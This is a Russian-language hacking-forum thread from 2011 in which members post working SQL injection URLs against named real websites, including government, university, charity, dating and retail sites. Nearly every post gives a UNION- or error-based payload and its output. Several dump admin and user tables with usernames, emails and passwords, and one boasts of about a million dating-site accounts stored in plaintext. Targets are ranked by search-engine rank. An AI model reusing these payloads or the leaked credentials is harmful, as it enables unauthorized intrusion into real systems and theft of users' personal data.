SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    725
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.bouldermicrofinance.org/_fra/index.php?page=f_curso&cnum=-26+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11--&len=FR
    Username: [email protected]
    Version: 5.1.39-log
    Database: profesores

    Google PR: 5
     
    1 person likes this.
  2. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    725
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.chartstats.com/release.php?release=-7259+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
    Username: [email protected]
    Version: 5.1.53-log
    Database: chartstats

    Google PR: 3
     
    1 person likes this.
  3. m0r0

    m0r0 New Member

    Joined:
    15 Mar 2011
    Messages:
    5
    Likes Received:
    2
    Reputations:
    4
    Для любителей клубнички :)

    http://altomrc.dk/index.asp?list=category&page=2&cat_id=-302+and+1=0+union+all+select+1,concat_ws%280x3a,password,email,username%29,3,4+from+sexdating_no.sexdating_users+limit+0,1+--+

    ИЗ этой СУБДшки можно вытянуть данные пользователей sexdating.de, sexdating.no, sexdating.su, а также еще кучи доменов

    В приведенном инъекте более 42 000 юзеров. В целом юзеров под лям. Все пароли - в открытом виде.
     
    1 person likes this.
  4. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Government
    http://www.plani[G00GLE]ficacion.catamarc[G00GLE]a.gov.ar/zomplog3.9/vernota.php?cod=-15+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,version(),12,13,14,15,16
     
    _________________________
    3 people like this.
  5. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    КИНОМАНИЯ.РУ, тИЦ - 1400
    Code:
    http://www.kinomania.ru/confirm/?id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GROUP%20BY%20CONCAT%28MID%28Password,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29+--+&code=15541515
    
    ++++++++++++++++++++++
    kinomaniaru,
    u5012_123,
    u5012_dump,
    u5012_for,u1'
    kinomaniaru1
    ++++++++++++++++++++++
    [email protected]
    5.0.90-log1
     
    4 people like this.
  6. DJ4J

    DJ4J Member

    Joined:
    23 Aug 2009
    Messages:
    0
    Likes Received:
    53
    Reputations:
    1
    Code:
    http://wintech.org/bookdetails.php?bookid=-1+union+select+1,concat%28nickname,0x3a,pass%29,3,4,5,6,7+from+tbl_user%20--
    хз где админка...
    5 ветка



    Code:
    http://www.service-js.jp/cms/show_news.php?id=-1+union+select+1,concat%28admin_user_name,0x3a,admin_user_pw%29,3,4+from+positive_admin_user+LIMIT+1,1--
     
    #13666 DJ4J, 22 Mar 2011
    Last edited: 22 Mar 2011
    1 person likes this.
  7. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    208
    Likes Received:
    279
    Reputations:
    32
    http://www.ultimatecarpage.com/show.php?num=-577+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+--
    Тиц: 40
    Пр: 5

    http://www.hccw.com/displayAttorney.php?num=-8+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--
    pr: 2

    http://www.domtomfr.com/commentaire.php?id=-1396+union+select+1,2,@@version,4,5+--
    tiz: 10
    pr: 4
     
    #13667 A_n_d_r_e_i, 22 Mar 2011
    Last edited: 22 Mar 2011
    1 person likes this.
  8. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    208
    Likes Received:
    279
    Reputations:
    32
    http://www.ecss.bb/viewproduct.php?pid=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18+--

    http://frigonoor.com/viewproduct.php?pid=-25+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+--
     
    #13668 A_n_d_r_e_i, 22 Mar 2011
    Last edited: 22 Mar 2011
    1 person likes this.
  9. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.thebitored.com/wordpress/wp-content/plugins/wp-forum/sendmail.php?action=quote&id=1%20union%20select%20version(),2,3%20--%20
     
    1 person likes this.
  10. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    208
    Likes Received:
    279
    Reputations:
    32
    http://www.microwebnow.com/portfolio/hi-caliberhealth/content.php?pageid=-1+union+select+group_concat(0x3a3a,u_name,0x3a,u_pwd)+from+tbl_users+--
    шопчик
    http://www.microwebnow.com/portfolio/hi-caliberhealth/content.php?pageid=-1+union+select+group_concat(0x3a3a,user,0x3a,pwd)+from+tbl_admin+--


    http://www.bible-history.com/subcat.php?id=13+union+select+group_concat(0x3a3a,admin_username,0x3a,admin_password)+from+administrators+--
    cy:40
    pr:6
     
    #13670 A_n_d_r_e_i, 22 Mar 2011
    Last edited: 23 Mar 2011
    2 people like this.
  11. m0r0

    m0r0 New Member

    Joined:
    15 Mar 2011
    Messages:
    5
    Likes Received:
    2
    Reputations:
    4
    http://www.homelessuk.org/details.asp?id=UK5666'+and+1=0+or+1=(select+top+1+name+from+sysusers)+--+
     
  12. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://www.cwmgalleries.biz/cwm_artist_bio.php?artist_id=-10113%20union%20select%20concat_ws(0x3a,host,user,password)%20from%20user--
     
    1 person likes this.
  13. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.tornworld.net/forgotpassword.php
    Method Post :
    Code:
    +(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
    user : '_!@4dilemma:0'
     
    #13673 bloodAngel, 24 Mar 2011
    Last edited by a moderator: 24 Mar 2011
    2 people like this.
  14. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    sportbox.ru (офф сайт телеканала роисся 2)
    Тиц - 3600
    PR - 6


    Code:
    http://sportbox.ru/rfpl/?archive=77+and+1=(select+version()||current_user)::int--
     
    #13674 ~d0s~, 24 Mar 2011
    Last edited: 24 Mar 2011
    7 people like this.
  15. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://homeidei.ru/index.php?link=6&id=-57%20and%201=2%20union%20select%20concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10+--
    директория /temp/ лежала в открытом виде и доступна для записи, админу отписанно, бага устранена а инъекция осталась)))
     
    2 people like this.
  16. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://www.isrm.co.uk/jobs/job_details.php?job_id=-511%20union%20select%201,2,3,4,5,6,7,8--
     
    1 person likes this.
  17. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    208
    Likes Received:
    279
    Reputations:
    32
    http://www.floramarket.kiev.ua/price.php?id=-224+union+select+1,2,3,4,5,6,group_concat(table_name),8,9+from+information_schema.tables+--

    http://www.greenroofs.com/projects/pview.php?id=-476+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--
     
    #13677 A_n_d_r_e_i, 24 Mar 2011
    Last edited: 24 Mar 2011
  18. m0r0

    m0r0 New Member

    Joined:
    15 Mar 2011
    Messages:
    5
    Likes Received:
    2
    Reputations:
    4
    http://users.unimi.it/discanti/personale/scheda.php?id_utente=-106 and 1=0 union all select 1,2,3,concat_ws(0x3a,password,username,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from db_discanti.utenti limit 0,1 --

    Google PR: 8

    admin2019:admin:

    Всего 82 юзера. Пароли в открытом виде.
     
    1 person likes this.
  19. m0r0

    m0r0 New Member

    Joined:
    15 Mar 2011
    Messages:
    5
    Likes Received:
    2
    Reputations:
    4
    http://www.radiococa.com/noticias.php?id=373 and 1=0 union all select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8 --

    Google PR: 2

    4.1.18-nt:arundanet_radiococa:usercoca@localhost
     
  20. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    http://www.facom-tools.co.uk/product_detail.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8+--+
    nt:facom_2008:facom_db@localhost
    PR 4
     
    1 person likes this.
Thread Status:
Not open for further replies.